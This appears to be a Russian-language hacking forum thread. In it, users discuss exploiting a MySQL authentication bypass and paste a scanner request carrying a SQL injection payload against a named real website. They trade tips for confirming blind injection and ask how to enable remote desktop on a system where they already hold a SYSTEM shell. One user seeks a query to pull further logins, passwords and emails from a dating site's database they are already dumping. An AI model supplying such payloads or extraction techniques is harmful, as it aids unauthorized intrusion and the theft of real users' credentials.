кто подскажет как это реализовать?

Удаленный пользователь может представить специально обработанный авторизационный пакет, чтобы обойти механизм авторизации на MySQL сервере. Уязвимость расположена в check_scramble_323() функции.

POST /index.php?id=211 HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.energia.ee
Content-Length: 282
Connection: Close
Pragma: no-cache
Acunetix-Product: WVS/5.5 (Acunetix Web Vulnerability Scanner - NORMAL)
Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm

html_enabled=1&subject=Elektritarne%20pakkumine%20 L%C3%A4tis%20v%C3%B5i%20Leedus&locationData=979%3A tt_content%3A3514&Ettev%C3%B5te="+or+1%3D1+--+&Kontaktisik=111-222-1933email@address.tst&Telefon=111-222-1933email@address.tst&Epost=111-222-1933email@address.tst&formtype_mail=Saada

Орёт,что скуля. Пробывал постами меняя параметры заставить отреагировать серв,но ему поф даже на 1+and+0=0 и 1+and+1=1

Менял параметры, как только мог. Есть тут инжект или нету?

Что ты хотел этим сказать? 0_о

моя хотело сказать,что ему абсолютно ПОФ,тобишь он возвращает одинаковый результат,обрезает чели,потому что при смени ид меняется только страница )),а запросы он как будто ваще не видит: )

по моему правильнее было так сделать =1+1 или =2-1 если страница та же то инжекта нет...

при подключение через mstsc.exe пишет Эудалённые подключения запрещены"
как запустить? есть шелл на удалённой системе к которой произвожу коннэкт.
права system

Велемир, а ты не думал, что 0 всегда равен нулю, как и 1 всегда будет равна самой себе?)) ты бы попробовал 1=2 и делал выводы. Ещё попробуй к id -1 подставлять и т.п.

Я так понял, что с этого ничего нельзя поиметь?

всем привет
частенько сталкиваюсь с извлечением большого количество данных из баз данных.
можно ли как-нибудь начать извлекать данные начиная к примеру с 20.000'ой записи?

К примеру:
Имеем дейтинг-сайт с логинами/пассами/мылами на 20к пользователей. В месяц региться ещё порядка 1к. Можно ли определённым запросом вывести на эран инфу начиная с 20.000? Чтобы не качать заново всю информацию полностью?

Спасибо всем ответившим =)